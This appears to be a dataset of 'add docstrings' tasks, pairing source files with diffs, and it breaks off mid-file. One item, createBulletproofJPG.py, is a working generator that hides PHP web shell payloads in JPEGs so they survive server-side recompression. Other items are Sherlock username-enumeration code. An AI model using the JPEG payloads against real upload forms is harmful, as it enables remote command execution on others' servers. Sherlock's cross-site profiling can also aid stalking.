extension: str = typer.Argument(help="Extension ID or name to disable"),
):
+ """Disable an extension without removing it."""
from .extensions import ExtensionManager, HookExecutor
project_root = Path.cwd()
@@ -3709,6 +3918,7 @@ extension: str = typer.Argument(help="Extension ID or name"),
priority: int = typer.Argument(help="New priority (lower = higher precedence)"),
):
+ """Set the resolution priority of an installed extension."""
from .extensions import ExtensionManager
project_root = Path.cwd()
@@ -3758,4 +3968,4 @@ app()
if __name__ == "__main__":
- main()+ main()
| https://raw.githubusercontent.com/github/spec-kit/HEAD/src/specify_cli/__init__.py |
Add docstrings that explain logic | #!/usr/bin/python
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import range
import struct,sys,os
import gd
from io import StringIO
from random import randint,shuffle
from time import time
# image width/height (square)
N = 32
def insertPayload(_in, _out, payload,off):
img = _in
# look for 'FF DA' (SOS)
sos = img.index("\xFF\xDA")
sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
sod = sos_size+2
# look for 'FF D9' (EOI)
eoi = img[sod:].index("\xFF\xD9")
# enough size ?
if (eoi - sod - off)>=len(payload):
_out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
return True
else:
return False
if __name__=='__main__':
print("[+] Virtualabs' Nasty bulletproof Jpeg generator")
print(" | website: http://virtualabs.fr")
print(" | contact: virtualabs -at- gmail -dot- com")
print("")
payloads = ["<?php system(/**/$_GET['c'/**/]); ?>","<?php /**/system($_GET[chr(99)/**/]); ?>","<?php system(/**/$_GET[chr(99)]); ?>","<?php\r\nsystem($_GET[/**/'c']);\r\n ?>"]
# make sure the exploit-jpg directory exists or create it
if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
print("[!] Please remove the file named 'exploit-jpg' from the current directory")
elif not os.path.exists('exploit-jpg'):
os.mkdir('exploit-jpg')
# start generation
print('[i] Generating ...')
for q in list(range(50,100))+[-1]:
# loop over every payload
for p in payloads:
# not done yet
done = False
start = time()
# loop while not done and timeout not reached
while not done and (time()-start)<10.0:
# we create a NxN pixels image, true colors
img = gd.image((N,N),True)
# we create a palette
pal = []
for i in range(N*N):
pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
# we shuffle this palette
shuffle(pal)
# and fill the image with it
pidx = 0
for x in range(N):
for y in range(N):
img.setPixel((x,y),pal[pidx])
pidx+=1
# write down the image
out_jpg = StringIO('')
img.writeJpeg(out_jpg,q)
out_raw = out_jpg.getvalue()
# now, we try to insert the payload various ways
for i in range(64):
test_jpg = StringIO('')
if insertPayload(out_raw,test_jpg,p,i):
try:
# write down the new jpeg file
f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
f.write(test_jpg.getvalue())
f.close()
# load it with GD
test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
final_jpg = StringIO('')
test.writeJpeg(final_jpg,q)
final_raw = final_jpg.getvalue()
# does it contain our payload ?
if p in final_raw:
# Yay !
print('[i] Jpeg quality %d ... DONE'%q)
done = True
break
except IOError as e:
pass
else:
break
if not done:
# payload not found, we remove the file
os.unlink('exploit-jpg/exploit-%d.jpg'%q)
else:
break
| --- +++ @@ -1,5 +1,28 @@ #!/usr/bin/python
+"""
+ Bulletproof Jpegs Generator
+ Copyright (C) 2012 Damien "virtualabs" Cauquil
+
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License along
+ with this program; if not, write to the Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+ -------------
+ # How to use
+ b.php?c=ls
+ Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l
+"""
from __future__ import print_function
from future import standard_library
@@ -16,6 +39,9 @@
def insertPayload(_in, _out, payload,off):
+ """
+ Payload insertion (quick JPEG parsing and patching)
+ """
img = _in
# look for 'FF DA' (SOS)
sos = img.index("\xFF\xDA")
| https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Compression/createBulletproofJPG.py |
Improve my code by adding docstrings | from enum import Enum
class QueryStatus(Enum):
CLAIMED = "Claimed" # Username Detected
AVAILABLE = "Available" # Username Not Detected
UNKNOWN = "Unknown" # Error Occurred While Trying To Detect Username
ILLEGAL = "Illegal" # Username Not Allowable For This Site
WAF = "WAF" # Request blocked by WAF (i.e. Cloudflare)
def __str__(self):
return self.value
class QueryResult():
def __init__(self, username, site_name, site_url_user, status,
query_time=None, context=None):
self.username = username
self.site_name = site_name
self.site_url_user = site_url_user
self.status = status
self.query_time = query_time
self.context = context
return
def __str__(self):
status = str(self.status)
if self.context is not None:
# There is extra context information available about the results.
# Append it to the normal response text.
status += f" ({self.context})"
return status | --- +++ @@ -1,7 +1,15 @@+"""Sherlock Result Module
+
+This module defines various objects for recording the results of queries.
+"""
from enum import Enum
class QueryStatus(Enum):
+ """Query Status Enumeration.
+
+ Describes status of query about a given username.
+ """
CLAIMED = "Claimed" # Username Detected
AVAILABLE = "Available" # Username Not Detected
UNKNOWN = "Unknown" # Error Occurred While Trying To Detect Username
@@ -9,11 +17,50 @@ WAF = "WAF" # Request blocked by WAF (i.e. Cloudflare)
def __str__(self):
+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
return self.value
class QueryResult():
+ """Query Result Object.
+
+ Describes result of query about a given username.
+ """
def __init__(self, username, site_name, site_url_user, status,
query_time=None, context=None):
+ """Create Query Result Object.
+
+ Contains information about a specific method of detecting usernames on
+ a given type of web sites.
+
+ Keyword Arguments:
+ self -- This object.
+ username -- String indicating username that query result
+ was about.
+ site_name -- String which identifies site.
+ site_url_user -- String containing URL for username on site.
+ NOTE: The site may or may not exist: this
+ just indicates what the name would
+ be, if it existed.
+ status -- Enumeration of type QueryStatus() indicating
+ the status of the query.
+ query_time -- Time (in seconds) required to perform query.
+ Default of None.
+ context -- String indicating any additional context
+ about the query. For example, if there was
+ an error, this might indicate the type of
+ error that occurred.
+ Default of None.
+
+ Return Value:
+ Nothing.
+ """
self.username = username
self.site_name = site_name
@@ -25,10 +72,18 @@ return
def __str__(self):
+ """Convert Object To String.
+
+ Keyword Arguments:
+ self -- This object.
+
+ Return Value:
+ Nicely formatted string to get information about this object.
+ """
status = str(self.status)
if self.context is not None:
# There is extra context information available about the results.
# Append it to the normal response text.
status += f" ({self.context})"
- return status+ return status
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/result.py |
Please document this code using docstrings | #! /usr/bin/env python3
import sys
try:
from sherlock_project.__init__ import import_error_test_var # noqa: F401
except ImportError:
print("Did you run Sherlock with `python3 sherlock/sherlock.py ...`?")
print("This is an outdated method. Please see https://sherlockproject.xyz/installation for up to date instructions.")
sys.exit(1)
import csv
import signal
import pandas as pd
import os
import re
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from json import loads as json_loads
from time import monotonic
from typing import Optional
import requests
from requests_futures.sessions import FuturesSession
from sherlock_project.__init__ import (
__longname__,
__shortname__,
__version__,
forge_api_latest_release,
)
from sherlock_project.result import QueryStatus
from sherlock_project.result import QueryResult
from sherlock_project.notify import QueryNotify
from sherlock_project.notify import QueryNotifyPrint
from sherlock_project.sites import SitesInformation
from colorama import init
from argparse import ArgumentTypeError
class SherlockFuturesSession(FuturesSession):
def request(self, method, url, hooks=None, *args, **kwargs):
# Record the start time for the request.
if hooks is None:
hooks = {}
start = monotonic()
def response_time(resp, *args, **kwargs):
resp.elapsed = monotonic() - start
return
# Install hook to execute when response completes.
# Make sure that the time measurement hook is first, so we will not
# track any later hook's execution time.
try:
if isinstance(hooks["response"], list):
hooks["response"].insert(0, response_time)
elif isinstance(hooks["response"], tuple):
# Convert tuple to list and insert time measurement hook first.
hooks["response"] = list(hooks["response"])
hooks["response"].insert(0, response_time)
else:
# Must have previously contained a single hook function,
# so convert to list.
hooks["response"] = [response_time, hooks["response"]]
except KeyError:
# No response hook was already defined, so install it ourselves.
hooks["response"] = [response_time]
return super(SherlockFuturesSession, self).request(
method, url, hooks=hooks, *args, **kwargs
)
def get_response(request_future, error_type, social_network):
# Default for Response object if some failure occurs.
response = None
error_context = "General Unknown Error"
exception_text = None
try:
response = request_future.result()
if response.status_code:
# Status code exists in response object
error_context = None
except requests.exceptions.HTTPError as errh:
error_context = "HTTP Error"
exception_text = str(errh)
except requests.exceptions.ProxyError as errp:
error_context = "Proxy Error"
exception_text = str(errp)
except requests.exceptions.ConnectionError as errc:
error_context = "Error Connecting"
exception_text = str(errc)
except requests.exceptions.Timeout as errt:
error_context = "Timeout Error"
exception_text = str(errt)
except requests.exceptions.RequestException as err:
error_context = "Unknown Error"
exception_text = str(err)
return response, error_context, exception_text
def interpolate_string(input_object, username):
if isinstance(input_object, str):
return input_object.replace("{}", username)
elif isinstance(input_object, dict):
return {k: interpolate_string(v, username) for k, v in input_object.items()}
elif isinstance(input_object, list):
return [interpolate_string(i, username) for i in input_object]
return input_object
def check_for_parameter(username):
return "{?}" in username
checksymbols = ["_", "-", "."]
def multiple_usernames(username):
allUsernames = []
for i in checksymbols:
allUsernames.append(username.replace("{?}", i))
return allUsernames
def sherlock(
username: str,
site_data: dict[str, dict[str, str]],
query_notify: QueryNotify,
dump_response: bool = False,
proxy: Optional[str] = None,
timeout: int = 60,
) -> dict[str, dict[str, str | QueryResult]]:
# Notify caller that we are starting the query.
query_notify.start(username)
# Normal requests
underlying_session = requests.session()
# Limit number of workers to 20.
# This is probably vastly overkill.
if len(site_data) >= 20:
max_workers = 20
else:
max_workers = len(site_data)
# Create multi-threaded session for all requests.
session = SherlockFuturesSession(
max_workers=max_workers, session=underlying_session
)
# Results from analysis of all sites
results_total = {}
# First create futures for all requests. This allows for the requests to run in parallel
for social_network, net_info in site_data.items():
# Results from analysis of this specific site
results_site = {"url_main": net_info.get("urlMain")}
# Record URL of main site
# A user agent is needed because some sites don't return the correct
# information since they think that we are bots (Which we actually are...)
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0",
}
if "headers" in net_info:
# Override/append any extra headers required by a given site.
headers.update(net_info["headers"])
# URL of user on site (if it exists)
url = interpolate_string(net_info["url"], username.replace(' ', '%20'))
# Don't make request if username is invalid for the site
regex_check = net_info.get("regexCheck")
if regex_check and re.search(regex_check, username) is None:
# No need to do the check at the site: this username is not allowed.
results_site["status"] = QueryResult(
username, social_network, url, QueryStatus.ILLEGAL
)
results_site["url_user"] = ""
results_site["http_status"] = ""
results_site["response_text"] = ""
query_notify.update(results_site["status"])
else:
# URL of user on site (if it exists)
results_site["url_user"] = url
url_probe = net_info.get("urlProbe")
request_method = net_info.get("request_method")
request_payload = net_info.get("request_payload")
request = None
if request_method is not None:
if request_method == "GET":
request = session.get
elif request_method == "HEAD":
request = session.head
elif request_method == "POST":
request = session.post
elif request_method == "PUT":
request = session.put
else:
raise RuntimeError(f"Unsupported request_method for {url}")
if request_payload is not None:
request_payload = interpolate_string(request_payload, username)
if url_probe is None:
# Probe URL is normal one seen by people out on the web.
url_probe = url
else:
# There is a special URL for probing existence separate
# from where the user profile normally can be found.
url_probe = interpolate_string(url_probe, username)
if request is None:
if net_info["errorType"] == "status_code":
# In most cases when we are detecting by status code,
# it is not necessary to get the entire body: we can
# detect fine with just the HEAD response.
request = session.head
else:
# Either this detect method needs the content associated
# with the GET response, or this specific website will
# not respond properly unless we request the whole page.
request = session.get
if net_info["errorType"] == "response_url":
# Site forwards request to a different URL if username not
# found. Disallow the redirect so we can capture the
# http status from the original URL request.
allow_redirects = False
else:
# Allow whatever redirect that the site wants to do.
# The final result of the request will be what is available.
allow_redirects = True
# This future starts running the request in a new thread, doesn't block the main thread
if proxy is not None:
proxies = {"http": proxy, "https": proxy}
future = request(
url=url_probe,
headers=headers,
proxies=proxies,
allow_redirects=allow_redirects,
timeout=timeout,
json=request_payload,
)
else:
future = request(
url=url_probe,
headers=headers,
allow_redirects=allow_redirects,
timeout=timeout,
json=request_payload,
)
# Store future in data for access later
net_info["request_future"] = future
# Add this site's results into final dictionary with all the other results.
results_total[social_network] = results_site
# Open the file containing account links
for social_network, net_info in site_data.items():
# Retrieve results again
results_site = results_total.get(social_network)
# Retrieve other site information again
url = results_site.get("url_user")
status = results_site.get("status")
if status is not None:
# We have already determined the user doesn't exist here
continue
# Get the expected error type
error_type = net_info["errorType"]
if isinstance(error_type, str):
error_type: list[str] = [error_type]
# Retrieve future and ensure it has finished
future = net_info["request_future"]
r, error_text, exception_text = get_response(
request_future=future, error_type=error_type, social_network=social_network
)
# Get response time for response of our request.
try:
response_time = r.elapsed
except AttributeError:
response_time = None
# Attempt to get request information
try:
http_status = r.status_code
except Exception:
http_status = "?"
try:
response_text = r.text.encode(r.encoding or "UTF-8")
except Exception:
response_text = ""
query_status = QueryStatus.UNKNOWN
error_context = None
# As WAFs advance and evolve, they will occasionally block Sherlock and
# lead to false positives and negatives. Fingerprints should be added
# here to filter results that fail to bypass WAFs. Fingerprints should
# be highly targetted. Comment at the end of each fingerprint to
# indicate target and date fingerprinted.
WAFHitMsgs = [
r'.loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark', # 2024-05-13 Cloudflare
r'<span id="challenge-error-text">', # 2024-11-11 Cloudflare error page
r'AwsWafIntegration.forceRefreshToken', # 2024-11-11 Cloudfront (AWS)
r'{return l.onPageView}}),Object.defineProperty(r,"perimeterxIdentifiers",{enumerable:' # 2024-04-09 PerimeterX / Human Security
]
if error_text is not None:
error_context = error_text
elif any(hitMsg in r.text for hitMsg in WAFHitMsgs):
query_status = QueryStatus.WAF
else:
if any(errtype not in ["message", "status_code", "response_url"] for errtype in error_type):
error_context = f"Unknown error type '{error_type}' for {social_network}"
query_status = QueryStatus.UNKNOWN
else:
if "message" in error_type:
# error_flag True denotes no error found in the HTML
# error_flag False denotes error found in the HTML
error_flag = True
errors = net_info.get("errorMsg")
# errors will hold the error message
# it can be string or list
# by isinstance method we can detect that
# and handle the case for strings as normal procedure
# and if its list we can iterate the errors
if isinstance(errors, str):
# Checks if the error message is in the HTML
# if error is present we will set flag to False
if errors in r.text:
error_flag = False
else:
# If it's list, it will iterate all the error message
for error in errors:
if error in r.text:
error_flag = False
break
if error_flag:
query_status = QueryStatus.CLAIMED
else:
query_status = QueryStatus.AVAILABLE
if "status_code" in error_type and query_status is not QueryStatus.AVAILABLE:
error_codes = net_info.get("errorCode")
query_status = QueryStatus.CLAIMED
# Type consistency, allowing for both singlets and lists in manifest
if isinstance(error_codes, int):
error_codes = [error_codes]
if error_codes is not None and r.status_code in error_codes:
query_status = QueryStatus.AVAILABLE
elif r.status_code >= 300 or r.status_code < 200:
query_status = QueryStatus.AVAILABLE
if "response_url" in error_type and query_status is not QueryStatus.AVAILABLE:
# For this detection method, we have turned off the redirect.
# So, there is no need to check the response URL: it will always
# match the request. Instead, we will ensure that the response
# code indicates that the request was successful (i.e. no 404, or
# forward to some odd redirect).
if 200 <= r.status_code < 300:
query_status = QueryStatus.CLAIMED
else:
query_status = QueryStatus.AVAILABLE
if dump_response:
print("+++++++++++++++++++++")
print(f"TARGET NAME : {social_network}")
print(f"USERNAME : {username}")
print(f"TARGET URL : {url}")
print(f"TEST METHOD : {error_type}")
try:
print(f"STATUS CODES : {net_info['errorCode']}")
except KeyError:
pass
print("Results...")
try:
print(f"RESPONSE CODE : {r.status_code}")
except Exception:
pass
try:
print(f"ERROR TEXT : {net_info['errorMsg']}")
except KeyError:
pass
print(">>>>> BEGIN RESPONSE TEXT")
try:
print(r.text)
except Exception:
pass
print("<<<<< END RESPONSE TEXT")
print("VERDICT : " + str(query_status))
print("+++++++++++++++++++++")
# Notify caller about results of query.
result: QueryResult = QueryResult(
username=username,
site_name=social_network,
site_url_user=url,
status=query_status,
query_time=response_time,
context=error_context,
)
query_notify.update(result)
# Save status of request
results_site["status"] = result
# Save results from request
results_site["http_status"] = http_status
results_site["response_text"] = response_text
# Add this site's results into final dictionary with all of the other results.
results_total[social_network] = results_site
return results_total
def timeout_check(value):
float_value = float(value)
if float_value <= 0:
raise ArgumentTypeError(
f"Invalid timeout value: {value}. Timeout must be a positive number."
)
return float_value
def handler(signal_received, frame):
sys.exit(0)
def main():
parser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
description=f"{__longname__} (Version {__version__})",
)
parser.add_argument(
"--version",
action="version",
version=f"{__shortname__} v{__version__}",
help="Display version information and dependencies.",
)
parser.add_argument(
"--verbose",
"-v",
"-d",
"--debug",
action="store_true",
dest="verbose",
default=False,
help="Display extra debugging information and metrics.",
)
parser.add_argument(
"--folderoutput",
"-fo",
dest="folderoutput",
help="If using multiple usernames, the output of the results will be saved to this folder.",
)
parser.add_argument(
"--output",
"-o",
dest="output",
help="If using single username, the output of the result will be saved to this file.",
)
parser.add_argument(
"--csv",
action="store_true",
dest="csv",
default=False,
help="Create Comma-Separated Values (CSV) File.",
)
parser.add_argument(
"--xlsx",
action="store_true",
dest="xlsx",
default=False,
help="Create the standard file for the modern Microsoft Excel spreadsheet (xlsx).",
)
parser.add_argument(
"--site",
action="append",
metavar="SITE_NAME",
dest="site_list",
default=[],
help="Limit analysis to just the listed sites. Add multiple options to specify more than one site.",
)
parser.add_argument(
"--proxy",
"-p",
metavar="PROXY_URL",
action="store",
dest="proxy",
default=None,
help="Make requests over a proxy. e.g. socks5://127.0.0.1:1080",
)
parser.add_argument(
"--dump-response",
action="store_true",
dest="dump_response",
default=False,
help="Dump the HTTP response to stdout for targeted debugging.",
)
parser.add_argument(
"--json",
"-j",
metavar="JSON_FILE",
dest="json_file",
default=None,
help="Load data from a JSON file or an online, valid, JSON file. Upstream PR numbers also accepted.",
)
parser.add_argument(
"--timeout",
action="store",
metavar="TIMEOUT",
dest="timeout",
type=timeout_check,
default=60,
help="Time (in seconds) to wait for response to requests (Default: 60)",
)
parser.add_argument(
"--print-all",
action="store_true",
dest="print_all",
default=False,
help="Output sites where the username was not found.",
)
parser.add_argument(
"--print-found",
action="store_true",
dest="print_found",
default=True,
help="Output sites where the username was found (also if exported as file).",
)
parser.add_argument(
"--no-color",
action="store_true",
dest="no_color",
default=False,
help="Don't color terminal output",
)
parser.add_argument(
"username",
nargs="+",
metavar="USERNAMES",
action="store",
help="One or more usernames to check with social networks. Check similar usernames using {?} (replace to '_', '-', '.').",
)
parser.add_argument(
"--browse",
"-b",
action="store_true",
dest="browse",
default=False,
help="Browse to all results on default browser.",
)
parser.add_argument(
"--local",
"-l",
action="store_true",
default=False,
help="Force the use of the local data.json file.",
)
parser.add_argument(
"--nsfw",
action="store_true",
default=False,
help="Include checking of NSFW sites from default list.",
)
# TODO deprecated in favor of --txt, retained for workflow compatibility, to be removed
# in future release
parser.add_argument(
"--no-txt",
action="store_true",
dest="no_txt",
default=False,
help="Disable creation of a txt file - WILL BE DEPRECATED",
)
parser.add_argument(
"--txt",
action="store_true",
dest="output_txt",
default=False,
help="Enable creation of a txt file",
)
parser.add_argument(
"--ignore-exclusions",
action="store_true",
dest="ignore_exclusions",
default=False,
help="Ignore upstream exclusions (may return more false positives)",
)
args = parser.parse_args()
# If the user presses CTRL-C, exit gracefully without throwing errors
signal.signal(signal.SIGINT, handler)
# Check for newer version of Sherlock. If it exists, let the user know about it
try:
latest_release_raw = requests.get(forge_api_latest_release, timeout=10).text
latest_release_json = json_loads(latest_release_raw)
latest_remote_tag = latest_release_json["tag_name"]
if latest_remote_tag[1:] != __version__:
print(
f"Update available! {__version__} --> {latest_remote_tag[1:]}"
f"\n{latest_release_json['html_url']}"
)
except Exception as error:
print(f"A problem occurred while checking for an update: {error}")
# Make prompts
if args.proxy is not None:
print("Using the proxy: " + args.proxy)
if args.no_color:
# Disable color output.
init(strip=True, convert=False)
else:
# Enable color output.
init(autoreset=True)
# Check if both output methods are entered as input.
if args.output is not None and args.folderoutput is not None:
print("You can only use one of the output methods.")
sys.exit(1)
# Check validity for single username output.
if args.output is not None and len(args.username) != 1:
print("You can only use --output with a single username")
sys.exit(1)
# Create object with all information about sites we are aware of.
try:
if args.local:
sites = SitesInformation(
os.path.join(os.path.dirname(__file__), "resources/data.json"),
honor_exclusions=False,
)
else:
json_file_location = args.json_file
if args.json_file:
# If --json parameter is a number, interpret it as a pull request number
if args.json_file.isnumeric():
pull_number = args.json_file
pull_url = f"https://api.github.com/repos/sherlock-project/sherlock/pulls/{pull_number}"
pull_request_raw = requests.get(pull_url, timeout=10).text
pull_request_json = json_loads(pull_request_raw)
# Check if it's a valid pull request
if "message" in pull_request_json:
print(f"ERROR: Pull request #{pull_number} not found.")
sys.exit(1)
head_commit_sha = pull_request_json["head"]["sha"]
json_file_location = f"https://raw.githubusercontent.com/sherlock-project/sherlock/{head_commit_sha}/sherlock_project/resources/data.json"
sites = SitesInformation(
data_file_path=json_file_location,
honor_exclusions=not args.ignore_exclusions,
do_not_exclude=args.site_list,
)
except Exception as error:
print(f"ERROR: {error}")
sys.exit(1)
if not args.nsfw:
sites.remove_nsfw_sites(do_not_remove=args.site_list)
# Create original dictionary from SitesInformation() object.
# Eventually, the rest of the code will be updated to use the new object
# directly, but this will glue the two pieces together.
site_data_all = {site.name: site.information for site in sites}
if args.site_list == []:
# Not desired to look at a sub-set of sites
site_data = site_data_all
else:
# User desires to selectively run queries on a sub-set of the site list.
# Make sure that the sites are supported & build up pruned site database.
site_data = {}
site_missing = []
for site in args.site_list:
counter = 0
for existing_site in site_data_all:
if site.lower() == existing_site.lower():
site_data[existing_site] = site_data_all[existing_site]
counter += 1
if counter == 0:
# Build up list of sites not supported for future error message.
site_missing.append(f"'{site}'")
if site_missing:
print(f"Error: Desired sites not found: {', '.join(site_missing)}.")
if not site_data:
sys.exit(1)
# Create notify object for query results.
query_notify = QueryNotifyPrint(
result=None, verbose=args.verbose, print_all=args.print_all, browse=args.browse
)
# Run report on all specified users.
all_usernames = []
for username in args.username:
if check_for_parameter(username):
for name in multiple_usernames(username):
all_usernames.append(name)
else:
all_usernames.append(username)
for username in all_usernames:
results = sherlock(
username,
site_data,
query_notify,
dump_response=args.dump_response,
proxy=args.proxy,
timeout=args.timeout,
)
if args.output:
result_file = args.output
elif args.folderoutput:
# The usernames results should be stored in a targeted folder.
# If the folder doesn't exist, create it first
os.makedirs(args.folderoutput, exist_ok=True)
result_file = os.path.join(args.folderoutput, f"{username}.txt")
else:
result_file = f"{username}.txt"
if args.output_txt:
with open(result_file, "w", encoding="utf-8") as file:
exists_counter = 0
for website_name in results:
dictionary = results[website_name]
if dictionary.get("status").status == QueryStatus.CLAIMED:
exists_counter += 1
file.write(dictionary["url_user"] + "\n")
file.write(f"Total Websites Username Detected On : {exists_counter}\n")
if args.csv:
result_file = f"{username}.csv"
if args.folderoutput:
# The usernames results should be stored in a targeted folder.
# If the folder doesn't exist, create it first
os.makedirs(args.folderoutput, exist_ok=True)
result_file = os.path.join(args.folderoutput, result_file)
with open(result_file, "w", newline="", encoding="utf-8") as csv_report:
writer = csv.writer(csv_report)
writer.writerow(
[
"username",
"name",
"url_main",
"url_user",
"exists",
"http_status",
"response_time_s",
]
)
for site in results:
if (
args.print_found
and not args.print_all
and results[site]["status"].status != QueryStatus.CLAIMED
):
continue
response_time_s = results[site]["status"].query_time
if response_time_s is None:
response_time_s = ""
writer.writerow(
[
username,
site,
results[site]["url_main"],
results[site]["url_user"],
str(results[site]["status"].status),
results[site]["http_status"],
response_time_s,
]
)
if args.xlsx:
usernames = []
names = []
url_main = []
url_user = []
exists = []
http_status = []
response_time_s = []
for site in results:
if (
args.print_found
and not args.print_all
and results[site]["status"].status != QueryStatus.CLAIMED
):
continue
if response_time_s is None:
response_time_s.append("")
else:
response_time_s.append(results[site]["status"].query_time)
usernames.append(username)
names.append(site)
url_main.append(results[site]["url_main"])
url_user.append(results[site]["url_user"])
exists.append(str(results[site]["status"].status))
http_status.append(results[site]["http_status"])
DataFrame = pd.DataFrame(
{
"username": usernames,
"name": names,
"url_main": [f'=HYPERLINK(\"{u}\")' for u in url_main],
"url_user": [f'=HYPERLINK(\"{u}\")' for u in url_user],
"exists": exists,
"http_status": http_status,
"response_time_s": response_time_s,
}
)
DataFrame.to_excel(f"{username}.xlsx", sheet_name="sheet1", index=False)
print()
query_notify.finish()
if __name__ == "__main__":
main() | --- +++ @@ -1,5 +1,11 @@ #! /usr/bin/env python3
+"""
+Sherlock: Find Usernames Across Social Networks Module
+
+This module contains the main logic to search for usernames at social
+networks.
+"""
import sys
@@ -41,12 +47,42 @@
class SherlockFuturesSession(FuturesSession):
def request(self, method, url, hooks=None, *args, **kwargs):
+ """Request URL.
+
+ This extends the FuturesSession request method to calculate a response
+ time metric to each request.
+
+ It is taken (almost) directly from the following Stack Overflow answer:
+ https://github.com/ross/requests-futures#working-in-the-background
+
+ Keyword Arguments:
+ self -- This object.
+ method -- String containing method desired for request.
+ url -- String containing URL for request.
+ hooks -- Dictionary containing hooks to execute after
+ request finishes.
+ args -- Arguments.
+ kwargs -- Keyword arguments.
+
+ Return Value:
+ Request object.
+ """
# Record the start time for the request.
if hooks is None:
hooks = {}
start = monotonic()
def response_time(resp, *args, **kwargs):
+ """Response Time Hook.
+
+ Keyword Arguments:
+ resp -- Response object.
+ args -- Arguments.
+ kwargs -- Keyword arguments.
+
+ Return Value:
+ Nothing.
+ """
resp.elapsed = monotonic() - start
return
@@ -115,6 +151,8 @@
def check_for_parameter(username):
+ """checks if {?} exists in the username
+ if exist it means that sherlock is looking for more multiple username"""
return "{?}" in username
@@ -122,6 +160,7 @@
def multiple_usernames(username):
+ """replace the parameter with with symbols and return a list of usernames"""
allUsernames = []
for i in checksymbols:
allUsernames.append(username.replace("{?}", i))
@@ -136,6 +175,34 @@ proxy: Optional[str] = None,
timeout: int = 60,
) -> dict[str, dict[str, str | QueryResult]]:
+ """Run Sherlock Analysis.
+
+ Checks for existence of username on various social media sites.
+
+ Keyword Arguments:
+ username -- String indicating username that report
+ should be created against.
+ site_data -- Dictionary containing all of the site data.
+ query_notify -- Object with base type of QueryNotify().
+ This will be used to notify the caller about
+ query results.
+ proxy -- String indicating the proxy URL
+ timeout -- Time in seconds to wait before timing out request.
+ Default is 60 seconds.
+
+ Return Value:
+ Dictionary containing results from report. Key of dictionary is the name
+ of the social network site, and the value is another dictionary with
+ the following keys:
+ url_main: URL of main site.
+ url_user: URL of user on site (if account exists).
+ status: QueryResult() object indicating results of test for
+ account existence.
+ http_status: HTTP status code of query which checked for existence on
+ site.
+ response_text: Text that came back from request. May be None if
+ there was an HTTP error when checking for existence.
+ """
# Notify caller that we are starting the query.
query_notify.start(username)
@@ -436,6 +503,19 @@
def timeout_check(value):
+ """Check Timeout Argument.
+
+ Checks timeout for validity.
+
+ Keyword Arguments:
+ value -- Time in seconds to wait before timing out request.
+
+ Return Value:
+ Floating point number representing the time (in seconds) that should be
+ used for the timeout.
+
+ NOTE: Will raise an exception if the timeout in invalid.
+ """
float_value = float(value)
@@ -448,6 +528,10 @@
def handler(signal_received, frame):
+ """Exit gracefully without throwing errors
+
+ Source: https://www.devdungeon.com/content/python-catch-sigint-ctrl-c
+ """
sys.exit(0)
@@ -855,4 +939,4 @@
if __name__ == "__main__":
- main()+ main()
| https://raw.githubusercontent.com/sherlock-project/sherlock/HEAD/sherlock_project/sherlock.py |
Add clean documentation to messy code | from sherlock_project.result import QueryStatus
from colorama import Fore, Style
import webbrowser
# Global variable to count the number of results.
globvar = 0
class QueryNotify:
def __init__(self, result=None):
self.result = result
# return
def start(self, message=None):
# return
def update(self, result):
self.result = result
# return
def finish(self, message=None):
# return
def __str__(self):
return str(self.result)
class QueryNotifyPrint(QueryNotify):
def __init__(self, result=None, verbose=False, print_all=False, browse=False):
super().__init__(result)
self.verbose = verbose
self.print_all = print_all
self.browse = browse
return
def start(self, message):
title = "Checking username"
print(Style.BRIGHT + Fore.GREEN + "[" +
Fore.YELLOW + "*" +
Fore.GREEN + f"] {title}" +
Fore.WHITE + f" {message}" +
Fore.GREEN + " on:")
# An empty line between first line and the result(more clear output)
print('\r')
return
def countResults(self):
global globvar
globvar += 1
return globvar
def update(self, result):
self.result = result
response_time_text = ""
if self.result.query_time is not None and self.verbose is True:
response_time_text = f" [{round(self.result.query_time * 1000)}ms]"
# Output to the terminal is desired.
if result.status == QueryStatus.CLAIMED:
self.countResults()
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.GREEN + "+" +
Fore.WHITE + "]" +
response_time_text +
Fore.GREEN +
f" {self.result.site_name}: " +
Style.RESET_ALL +
f"{self.result.site_url_user}")
if self.browse:
webbrowser.open(self.result.site_url_user, 2)
elif result.status == QueryStatus.AVAILABLE:
if self.print_all:
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
response_time_text +
Fore.GREEN + f" {self.result.site_name}:" +
Fore.YELLOW + " Not Found!")
elif result.status == QueryStatus.UNKNOWN:
if self.print_all:
print(Style.BRIGHT + Fore.WHITE + "[" +
Fore.RED + "-" +
Fore.WHITE + "]" +
Fore.GREEN + f" {self.result.site_name}:" +
Fore.RED + f" {self.result.context}" +
Fore.YELLOW + " ")
elif result.status == QueryStatus.ILLEGAL:
if self.print_all:
